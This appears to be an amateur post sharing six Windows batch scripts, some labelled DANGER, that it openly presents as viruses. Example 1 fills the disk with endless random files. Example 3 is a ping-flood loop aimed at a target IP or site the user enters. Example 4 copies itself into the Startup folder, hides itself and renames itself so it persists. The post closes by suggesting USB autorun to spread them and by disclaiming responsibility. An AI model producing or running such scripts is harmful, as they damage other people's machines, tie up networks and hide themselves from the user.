Example 1: DANGER
---------------------------
@echo off
:1
echo %random%REAPER%random% >> %random%REAPER%random%
goto :1
---------------------------
Example 2: SAFE
---------------------------
@echo off
:1
%random%%random%%random%%random%%random%%random%%random%%random%
goto :1
---------------------------
Example 3: DANGER(not to you)
---------------------------
@echo off
set /p target=enter target ip or something like www.google.com nothing extra to the url just www. (website) and .com or whatever it is.=
set /p packets=enter number of packets some max is 65500=
:1
ping %target% /l %packets% /n 1
goto :1
--------------------------
Example 4: SAFE(depending on what code you use)
--------------------------
@echo off
if exist "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\batchfilename" goto :next
goto :skip
:next
move batchfilename "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /y
attrib +h +s "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\batchfilename"
ren "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\batchfilename" %random%text%random%
exit
:skip
echo code goes here
pause
------------------------
Example 5: SAFE(again, depending on what code you use)
------------------------
@echo off
set /p text=would you like to play? Y or N=
if '%text%'=='Y' goto :next
if '%text%'=='y' goto :next
if '%text%'=='N' goto :exit
if '%text%'=='n' goto :exit
goto :exit
:next
echo code goes here!
:exit
exit
-----------------------
Example 6: SAFE(still depending on what code you use...)
-----------------------
@echo off
goto :2
:1
echo enter code here 1
goto :3
:2
echo enter code here 2
goto :1
:3
echo enter code here 3
goto :2
----------------------
do not copy the lines, save the file as a batch file/.bat file
these are dangerous (oh, also feel free to change it up like username to exclude for virus, name of batch file, basically whatever doesn't break the entire thing.)
and if you want to make a usb virus use: https://usb-autorun-creator.en.softonic.com/
it is SUPER easy to use. I do not take credit for any damage you do with this information, I am not forcing you to do this so the only person you can blame is yourself.
also feel free to check out my youtube channel: https://www.youtube.com/channel/UC-of0mj_reR7WjmvnvpqbEA Fox GamingYT.